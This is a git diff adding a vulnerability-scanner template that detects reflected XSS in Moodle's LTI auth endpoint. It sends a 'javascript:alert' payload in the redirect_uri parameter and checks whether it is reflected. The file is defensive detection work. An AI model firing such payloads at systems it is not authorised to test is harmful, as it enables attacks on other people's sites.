diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml
new file mode 100644
index 0000000000..3ec9f75720
--- /dev/null
+++ b/vulnerabilities/moodle/moodle-xss.yaml
@@ -0,0 +1,30 @@
+id: moodle-xss
+
+info:
+  name: Moodle redirect_uri Reflected XSS
+  author: hackergautam
+  description: XSS in moodle via redirect_uri parameter
+  severity: medium
+  tags: moodle,xss
+  reference: https://twitter.com/kx1z0/status/1381588818256617479
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{randstr}}"
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
\ No newline at end of file